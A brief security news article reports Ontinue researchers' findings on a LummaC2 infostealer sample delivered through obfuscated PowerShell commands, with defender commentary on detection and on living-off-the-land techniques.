LummaC2 infostealer uses obfuscated scripts via PowerShell to target endpoints
A new sample of the LummaC2 infostealer was observed using a series of PowerShell commands that downloaded and executed a payload on a targeted endpoint.
In a recent blog post, researchers at Ontinue described LummaC2 as an information-stealing malware written in the C programming language that’s designed to steal sensitive information.
The researchers said the malware was observed being used as malware-as-a-service (MaaS), and was seen on Russian-speaking forums starting in 2022. The malware infects the target host and aims to steal information from the endpoint and then exfiltrate it to the C2 server.
“The key takeaway from our analysis is a reinforcement of the importance of monitoring and mitigating obfuscated scripts, particularly those delivered via PowerShell,” said Rhys Downing cyber defender at Ontinue. “While the use of obfuscated PowerShell commands is not new, it remains a highly effective technique for attackers. Security teams should prioritize enhancing their detection and response capabilities around such tactics, ensuring that even well-known methods are continuously scrutinized and blocked.”
LummaC2’s resurgence highlights significant risks because of its sophisticated use of PowerShell and “living-off-the-land” binaries already available within an environment, making it harder to detect and mitigate, said Jason Soroko, senior fellow at Sectigo.
